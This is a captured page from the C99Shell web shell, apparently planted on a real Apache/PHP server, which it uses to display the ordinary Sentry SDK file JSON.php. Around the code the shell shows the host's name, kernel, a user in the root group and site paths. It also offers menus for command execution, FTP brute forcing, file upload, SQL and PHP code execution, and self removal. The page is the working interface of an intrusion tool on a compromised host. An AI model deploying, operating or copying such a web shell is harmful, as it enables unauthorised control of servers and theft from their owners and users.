!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/classify.picotech.app/public_html/vendor/sentry/sentry/src/Util/   drwxr-xr-x
Free 29.13 GB of 117.98 GB (24.69%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     JSON.php (2.01 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

declare(strict_types=1);

namespace 
Sentry\Util;

use 
Sentry\Exception\JsonException;

/**
 * This class provides some utility methods to encode/decode JSON data.
 *
 * @author Stefano Arlandini <sarlandini@alice.it>
 *
 * @internal
 */
final class JSON
{
    
/**
     * Encodes the given data into JSON.
     *
     * @param mixed $data     The data to encode
     * @param int   $options  Bitmask consisting of JSON_* constants
     * @param int   $maxDepth The maximum depth allowed for serializing $data
     *
     * @throws JsonException If the encoding failed
     */
    
public static function encode($dataint $options 0int $maxDepth 512): string
    
{
        if (
$maxDepth 1) {
            throw new 
\InvalidArgumentException('The $maxDepth argument must be an integer greater than 0.');
        }

        
$options |= \JSON_UNESCAPED_UNICODE \JSON_INVALID_UTF8_SUBSTITUTE \JSON_PARTIAL_OUTPUT_ON_ERROR;

        
$encodedData json_encode($data$options$maxDepth);

        
$allowedErrors = [\JSON_ERROR_NONE\JSON_ERROR_RECURSION\JSON_ERROR_INF_OR_NAN\JSON_ERROR_UNSUPPORTED_TYPE];

        
$encounteredAnyError \JSON_ERROR_NONE !== json_last_error();

        if ((
$encounteredAnyError && ('null' === $encodedData || false === $encodedData)) || !\in_array(json_last_error(), $allowedErrorstrue)) {
            throw new 
JsonException(sprintf('Could not encode value into JSON format. Error was: "%s".'json_last_error_msg()));
        }

        return 
$encodedData;
    }

    
/**
     * Decodes the given data from JSON.
     *
     * @param string $data The data to decode
     *
     * @return mixed
     *
     * @throws JsonException If the decoding failed
     */
    
public static function decode(string $data)
    {
        
$decodedData json_decode($datatrue);

        if (
\JSON_ERROR_NONE !== json_last_error()) {
            throw new 
JsonException(sprintf('Could not decode value from JSON format. Error was: "%s".'json_last_error_msg()));
        }

        return 
$decodedData;
    }
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0033 ]--